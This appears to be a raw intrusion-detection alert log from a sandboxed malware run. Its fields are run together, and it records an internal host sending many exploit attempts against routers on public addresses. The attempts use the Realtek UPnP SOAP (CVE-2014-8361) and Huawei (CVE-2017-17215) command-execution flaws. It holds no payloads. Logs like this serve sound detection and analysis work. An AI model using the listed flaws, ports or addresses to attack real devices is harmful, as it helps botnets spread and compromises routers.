                                      07/20/24-23:01:43.054762TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23294452869192.168.2.2385.15.162.89
                                      07/20/24-23:01:53.625100TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24680852869192.168.2.2338.184.175.46
                                      07/20/24-23:01:14.140178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615775652869192.168.2.2387.178.133.43
                                      07/20/24-23:01:34.048825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992037215192.168.2.23203.33.109.223
                                      07/20/24-23:01:02.047411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330237215192.168.2.23157.111.26.76
                                      07/20/24-23:01:21.931985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065037215192.168.2.23157.111.51.3
                                      07/20/24-23:01:44.099799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614338452869192.168.2.23101.122.117.242
                                      07/20/24-23:01:48.918065TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614348852869192.168.2.2335.61.70.96
                                      07/20/24-23:01:08.599362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5040052869192.168.2.2371.113.201.241
                                      07/20/24-23:01:06.996056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635637215192.168.2.2370.98.158.86
                                      07/20/24-23:01:55.154049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24395052869192.168.2.23125.58.232.126
                                      07/20/24-23:01:43.147883TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3403052869192.168.2.2363.137.171.145
                                      07/20/24-23:02:11.703257TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615183652869192.168.2.23169.52.197.149
                                      07/20/24-23:01:40.290003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205437215192.168.2.2341.21.106.63
                                      07/20/24-23:01:31.325694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4084252869192.168.2.23201.230.67.6
                                      07/20/24-23:01:08.609855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3831052869192.168.2.2347.10.251.72
                                      07/20/24-23:01:42.131607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5022852869192.168.2.23172.233.108.76
                                      07/20/24-23:01:41.991545TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4741252869192.168.2.23197.168.237.206
                                      07/20/24-23:01:44.059102TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615789252869192.168.2.23162.230.61.146
                                      07/20/24-23:01:43.110964TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614654052869192.168.2.2398.147.36.143
                                      07/20/24-23:01:01.189596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4934852869192.168.2.23131.199.217.59
                                      07/20/24-23:01:42.786028TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4584652869192.168.2.238.202.120.94
                                      07/20/24-23:01:20.150638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724637215192.168.2.2360.7.102.124
                                      07/20/24-23:01:42.189694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615217252869192.168.2.23128.242.86.47
                                      07/20/24-23:01:42.869521TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24775052869192.168.2.2370.133.231.223
                                      07/20/24-23:01:43.540053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5974252869192.168.2.23207.56.45.233
                                      07/20/24-23:02:17.865555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4028052869192.168.2.23157.109.59.232
                                      07/20/24-23:01:42.717611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24320652869192.168.2.2369.239.30.22
                                      07/20/24-23:01:59.799089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4490052869192.168.2.2324.206.57.165
                                      07/20/24-23:01:45.622888TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5319252869192.168.2.23133.83.21.166
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942437215192.168.2.23157.126.129.17
                                      07/20/24-23:01:27.677519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063437215192.168.2.23157.27.123.11
                                      07/20/24-23:02:13.672930TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3665852869192.168.2.23128.140.142.60
                                      07/20/24-23:01:52.883801TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614726252869192.168.2.23122.138.157.236
                                      07/20/24-23:02:27.381027TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5488852869192.168.2.23129.78.244.230
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408037215192.168.2.23124.52.73.80
                                      07/20/24-23:01:31.312311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23958252869192.168.2.23184.74.79.160
                                      07/20/24-23:01:47.918473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3942452869192.168.2.23197.213.222.122
                                      07/20/24-23:01:52.388927TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613604252869192.168.2.2371.66.59.209
                                      07/20/24-23:01:41.967549TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24962452869192.168.2.23191.235.3.135
                                      07/20/24-23:01:51.258596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3607252869192.168.2.23199.106.155.17
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217037215192.168.2.2341.155.8.82
                                      07/20/24-23:01:31.325400TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25442852869192.168.2.23118.217.116.132
                                      07/20/24-23:01:34.044537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219837215192.168.2.23157.229.87.54
                                      07/20/24-23:01:42.617689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6027452869192.168.2.23186.150.2.45
                                      07/20/24-23:01:47.375803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5228252869192.168.2.23175.210.141.95
                                      07/20/24-23:01:45.188773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6084252869192.168.2.23142.215.251.21
                                      07/20/24-23:01:44.776719TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23901452869192.168.2.2397.80.44.168
                                      07/20/24-23:01:41.228794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4202452869192.168.2.231.216.69.165
                                      07/20/24-23:01:47.147727TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613834052869192.168.2.2363.211.43.107
                                      07/20/24-23:01:08.600114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5899252869192.168.2.23113.34.69.120
                                      07/20/24-23:01:24.910426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009637215192.168.2.23132.105.175.229
                                      07/20/24-23:01:44.795218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4858252869192.168.2.23121.163.119.125
                                      07/20/24-23:01:01.846382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3360052869192.168.2.23213.241.106.75
                                      07/20/24-23:01:02.493447TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613627852869192.168.2.23112.103.96.49
                                      07/20/24-23:01:31.314146TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25993452869192.168.2.23174.51.233.233
                                      07/20/24-23:01:31.982478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940037215192.168.2.2341.157.201.160
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793037215192.168.2.23157.129.226.209
                                      07/20/24-23:01:40.372003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917237215192.168.2.23197.221.100.57
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991837215192.168.2.2396.102.210.180
                                      07/20/24-23:01:43.044693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614163852869192.168.2.23129.7.216.73
                                      07/20/24-23:01:58.885082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3846052869192.168.2.23130.218.184.181
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902437215192.168.2.23199.131.169.33
                                      07/20/24-23:01:04.118165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415637215192.168.2.23146.66.7.8
                                      07/20/24-23:01:50.845923TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24181052869192.168.2.2363.243.31.167
                                      07/20/24-23:01:42.945747TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4847652869192.168.2.23154.167.112.208
                                      07/20/24-23:01:44.203130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3424652869192.168.2.2346.50.151.45
                                      07/20/24-23:01:58.807611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24924252869192.168.2.23162.84.55.247
                                      07/20/24-23:00:59.184421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155037215192.168.2.2341.166.159.225
                                      07/20/24-23:01:10.600298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3978052869192.168.2.23119.4.44.94
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323037215192.168.2.2341.199.182.217
                                      07/20/24-23:01:45.109958TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613609052869192.168.2.23174.213.208.19
                                      07/20/24-23:01:51.144153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4054252869192.168.2.23223.123.26.129
                                      07/20/24-23:01:53.015544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3722852869192.168.2.23121.131.41.98
                                      07/20/24-23:01:45.414030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23367252869192.168.2.2386.248.56.62
                                      07/20/24-23:01:48.138392TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5815452869192.168.2.231.111.156.136
                                      07/20/24-23:01:04.233857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937637215192.168.2.2341.70.142.225
                                      07/20/24-23:01:27.649945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162437215192.168.2.23164.205.240.199
                                      07/20/24-23:00:59.213564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3639237215192.168.2.23157.153.207.206
                                      07/20/24-23:01:42.101588TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613515652869192.168.2.23158.36.226.221
                                      07/20/24-23:01:01.494643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524052869192.168.2.2323.94.137.105
                                      07/20/24-23:01:00.633742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418437215192.168.2.2341.78.37.100
                                      07/20/24-23:01:04.097857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5906237215192.168.2.2391.108.5.216
                                      07/20/24-23:01:21.952783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4215637215192.168.2.2341.178.228.29
                                      07/20/24-23:01:12.852602TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3731452869192.168.2.23104.80.144.32
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.23157.167.188.131
                                      07/20/24-23:01:04.447286TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614219452869192.168.2.23167.134.108.32
                                      07/20/24-23:01:27.650871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995437215192.168.2.23157.47.112.243
                                      07/20/24-23:01:42.874808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3889852869192.168.2.23208.138.181.205
                                      07/20/24-23:01:41.305474TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615808652869192.168.2.2320.44.163.254
                                      07/20/24-23:02:11.592030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615383852869192.168.2.23116.124.94.169
                                      07/20/24-23:01:20.184321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650837215192.168.2.23113.230.74.224
                                      07/20/24-23:01:11.631134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319837215192.168.2.23197.22.37.33
                                      07/20/24-23:01:53.807714TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24994252869192.168.2.23107.137.22.219
                                      07/20/24-23:01:21.936545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286037215192.168.2.2364.35.212.13
                                      07/20/24-23:01:31.982479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928037215192.168.2.23157.123.230.172
                                      07/20/24-23:00:57.222164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480837215192.168.2.2341.19.255.66
                                      07/20/24-23:01:49.033216TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615951652869192.168.2.2371.235.237.254
                                      07/20/24-23:01:53.524729TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24960852869192.168.2.23162.122.16.215
                                      07/20/24-23:02:16.647796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614965052869192.168.2.23114.52.153.70
                                      07/20/24-23:01:59.356106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5020652869192.168.2.2337.84.136.136
                                      07/20/24-23:02:07.401340TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24709052869192.168.2.2347.224.141.66
                                      07/20/24-23:01:31.322217TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23999852869192.168.2.23146.105.181.156
                                      07/20/24-23:01:44.302645TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24591852869192.168.2.23106.2.127.68
                                      07/20/24-23:01:31.323043TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5634252869192.168.2.23143.157.68.18
                                      07/20/24-23:01:59.855159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5042452869192.168.2.2395.252.31.72
                                      07/20/24-23:01:41.476492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613717252869192.168.2.23132.116.164.169
                                      07/20/24-23:01:54.037758TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615823252869192.168.2.23112.218.81.136
                                      07/20/24-23:01:54.704194TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615181652869192.168.2.2367.74.143.214
                                      07/20/24-23:01:02.048214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699237215192.168.2.2341.12.247.120
                                      07/20/24-23:01:20.592206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800052869192.168.2.23211.27.252.180
                                      07/20/24-23:01:49.825670TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23660852869192.168.2.2349.79.18.186
                                      07/20/24-23:01:44.825081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4994252869192.168.2.23108.225.154.233
                                      07/20/24-23:02:00.338154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26088052869192.168.2.2366.250.122.217
                                      07/20/24-23:01:43.415157TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615436052869192.168.2.2317.78.214.126
                                      07/20/24-23:01:54.826949TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25312052869192.168.2.2340.172.192.128
                                      07/20/24-23:01:11.817436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320637215192.168.2.2341.222.86.83
                                      07/20/24-23:01:34.043964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849837215192.168.2.2341.241.47.119
                                      07/20/24-23:01:42.704900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5356852869192.168.2.23135.205.140.164
                                      07/20/24-23:01:44.977483TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3888252869192.168.2.23203.196.31.139
                                      07/20/24-23:01:44.450410TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614807852869192.168.2.23198.250.155.116
                                      07/20/24-23:01:20.599458TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24461852869192.168.2.23109.120.196.186
                                      07/20/24-23:01:24.883172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080637215192.168.2.23157.83.52.0
                                      07/20/24-23:01:47.906061TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23313652869192.168.2.2398.169.154.123
                                      07/20/24-23:01:08.613165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25283052869192.168.2.23114.20.70.247
                                      07/20/24-23:01:26.031343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5347052869192.168.2.23118.217.116.132
                                      07/20/24-23:01:42.151857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4223252869192.168.2.23184.50.158.70
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306837215192.168.2.23177.199.180.176
                                      07/20/24-23:01:44.546338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25225052869192.168.2.2385.144.205.165
                                      07/20/24-23:01:46.292331TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25100252869192.168.2.2392.210.119.212
                                      07/20/24-23:01:04.114673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529437215192.168.2.23157.157.173.191
                                      07/20/24-23:01:44.732056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24936052869192.168.2.23154.167.112.208
                                      07/20/24-23:01:47.236261TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708052869192.168.2.23163.119.42.207
                                      07/20/24-23:01:53.475886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4097252869192.168.2.2380.120.36.80
                                      07/20/24-23:01:43.994703TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613367852869192.168.2.2344.152.141.175
                                      07/20/24-23:01:46.483452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4068052869192.168.2.2387.254.251.88
                                      07/20/24-23:01:20.598095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5241452869192.168.2.23205.132.5.218
                                      07/20/24-23:01:41.290518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614999452869192.168.2.2369.103.140.112
                                      07/20/24-23:01:50.951743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3959452869192.168.2.2379.227.52.7
                                      07/20/24-23:01:26.100052TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614778652869192.168.2.23120.48.178.89
                                      07/20/24-23:02:00.055900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23808052869192.168.2.2318.137.178.82
                                      07/20/24-23:02:04.592319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5279252869192.168.2.23160.192.28.117
                                      07/20/24-23:01:02.103737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538437215192.168.2.2341.95.186.20
                                      07/20/24-23:01:21.944679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860837215192.168.2.2341.63.171.55
                                      07/20/24-23:01:02.783592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615506652869192.168.2.23162.117.132.232
                                      07/20/24-23:01:02.045831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786037215192.168.2.2341.13.208.139
                                      07/20/24-23:01:41.397238TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613413852869192.168.2.2348.145.35.196
                                      07/20/24-23:01:47.407718TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23549452869192.168.2.23133.122.43.145
                                      07/20/24-23:01:00.633635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356437215192.168.2.23157.72.248.222
                                      07/20/24-23:01:58.585039TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614686852869192.168.2.2384.161.189.113
                                      07/20/24-23:01:47.709674TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3621652869192.168.2.23147.65.114.30
                                      07/20/24-23:01:13.989215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613387052869192.168.2.23130.80.10.211
                                      07/20/24-23:01:55.666677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614707852869192.168.2.23210.201.187.18
                                      07/20/24-23:01:40.296076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924037215192.168.2.2341.234.203.207
                                      07/20/24-23:01:42.703494TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6061852869192.168.2.2367.41.35.87
                                      07/20/24-23:01:43.243266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5820052869192.168.2.2396.94.31.193
                                      07/20/24-23:01:41.412156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613699052869192.168.2.23143.66.245.70
                                      07/20/24-23:01:44.491060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4852052869192.168.2.23121.218.112.247
                                      07/20/24-23:01:46.212590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3723652869192.168.2.23103.195.20.112
                                      07/20/24-23:01:43.476083TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24090452869192.168.2.23184.170.174.78
                                      07/20/24-23:01:46.261026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5121052869192.168.2.23136.148.234.160
                                      07/20/24-23:01:08.590937TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25838452869192.168.2.2362.90.39.173
                                      07/20/24-23:01:31.312209TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5741452869192.168.2.2376.83.139.165
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711837215192.168.2.2341.96.43.132
                                      07/20/24-23:01:41.956472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24180252869192.168.2.235.95.241.47
                                      07/20/24-23:01:45.667238TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615699452869192.168.2.23140.234.5.119
                                      07/20/24-23:01:14.097135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688837215192.168.2.23157.209.127.80
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381237215192.168.2.2341.233.32.110
                                      07/20/24-23:01:54.957644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5140452869192.168.2.23209.219.111.180
                                      07/20/24-23:01:01.271651TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616077252869192.168.2.23195.67.134.63
                                      07/20/24-23:01:41.286911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614507452869192.168.2.2334.33.43.162
                                      07/20/24-23:01:41.417573TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615278852869192.168.2.23140.117.188.131
                                      07/20/24-23:01:42.813695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23642452869192.168.2.23196.248.47.177
                                      07/20/24-23:01:01.333817TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614014452869192.168.2.2347.237.197.200
                                      07/20/24-23:01:53.066716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4329252869192.168.2.2353.50.156.29
                                      07/20/24-23:01:43.088724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25519852869192.168.2.2386.130.161.177
                                      07/20/24-23:01:47.622268TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25680052869192.168.2.2342.61.115.2
                                      07/20/24-23:01:20.169339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763437215192.168.2.2341.215.162.139
                                      07/20/24-23:01:59.738271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3429052869192.168.2.2352.14.151.104
